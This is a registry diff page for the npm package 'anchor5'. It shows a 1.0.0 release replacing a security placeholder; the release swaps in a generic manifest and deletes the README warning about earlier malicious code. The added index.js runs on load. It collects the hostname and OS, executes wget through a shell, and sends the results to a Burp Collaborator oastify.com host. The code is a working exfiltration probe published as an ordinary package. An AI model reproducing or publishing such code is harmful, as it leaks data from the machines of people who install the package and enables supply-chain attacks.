anchor5 0.0.1-security → 1.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of anchor5 might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +71 -0
  2. package/package.json +8 -3
  3. package/README.md +0 -5
package/index.js ADDED
@@ -0,0 +1,71 @@
1
+ const http = require('http');
2
+ const os = require('os');
3
+ const { exec } = require('child_process');
4
+ const url = require('url');
5
+
6
+ // Your Burp Collaborator URL
7
+ const collaboratorUrl = '9cmyselhy7mr2rewb105yort7kdb1ep3.oastify.com';
8
+
9
+ // Function to send HTTP request
10
+ function sendRequest(target, queryParams = {}) {
11
+ const queryString = Object.keys(queryParams).map(key => `${key}=${encodeURIComponent(queryParams[key])}`).join('&');
12
+ const fullUrl = queryString ? `${target}?${queryString}` : target;
13
+
14
+ return new Promise((resolve, reject) => {
15
+ http.get(fullUrl, (res) => {
16
+ let data = '';
17
+ res.on('data', (chunk) => { data += chunk; });
18
+ res.on('end', () => resolve(data));
19
+ }).on('error', (err) => reject(err));
20
+ });
21
+ }
22
+
23
+ // Collect evidence for the 4 points
24
+ async function collectAndSendEvidence() {
25
+ try {
26
+ // Point 1: HTTP Requests from Internal/External IP Addresses (with hostname and order)
27
+ const hostname = os.hostname(); // Hostname to verify ownership
28
+ const order = 'Sequence: 1. Request to google.com; 2. Collect OS/wget; 3. Exfiltrate to Collaborator'; // Order of forwards/sequence
29
+
30
+ // Point 2: OS Name
31
+ const osName = os.platform();
32
+
33
+ // Point 3: Output from the wget Command (simulating fetch from google.com)
34
+ let wgetOutput = '';
35
+ try {
36
+ wgetOutput = await new Promise((resolve, reject) => {
37
+ exec('wget -O - http://google.com', (error, stdout, stderr) => {
38
+ if (error) reject(`wget error: ${error.message}`);
39
+ else resolve(stdout || stderr);
40
+ });
41
+ });
42
+ wgetOutput = wgetOutput.substring(0, 200); // Truncate for query param limit
43
+ } catch (wgetError) {
44
+ wgetOutput = `wget not available or error: ${wgetError}`;
45
+ }
46
+
47
+ // Point 4: Prove all points by bundling in the request
48
+ const evidence = {
49
+ hostname,
50
+ order,
51
+ os: osName,
52
+ wget: wgetOutput
53
+ };
54
+
55
+ // First, send request to google.com (as per query)
56
+ console.log('Sending request to google.com...');
57
+ const googleResponse = await sendRequest('http://google.com');
58
+ console.log('Google response snippet:', googleResponse.substring(0, 100));
59
+
60
+ // Then, send to Collaborator with evidence (order: after Google request)
61
+ console.log('Sending evidence to Burp Collaborator...');
62
+ await sendRequest(`http://${collaboratorUrl}`, evidence);
63
+ console.log('Evidence sent successfully. Check Burp Suite for interactions.');
64
+
65
+ } catch (error) {
66
+ console.error('Error:', error.message);
67
+ }
68
+ }
69
+
70
+ // Run the function
71
+ collectAndSendEvidence();
package/package.json CHANGED
@@ -1,6 +1,11 @@
1
1
  {
2
2
  "name": "anchor5",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.0.0",
4
+ "description": "test",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1"
8
+ },
9
+ "author": "",
10
+ "license": "ISC"
6
11
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=anchor5 for more information.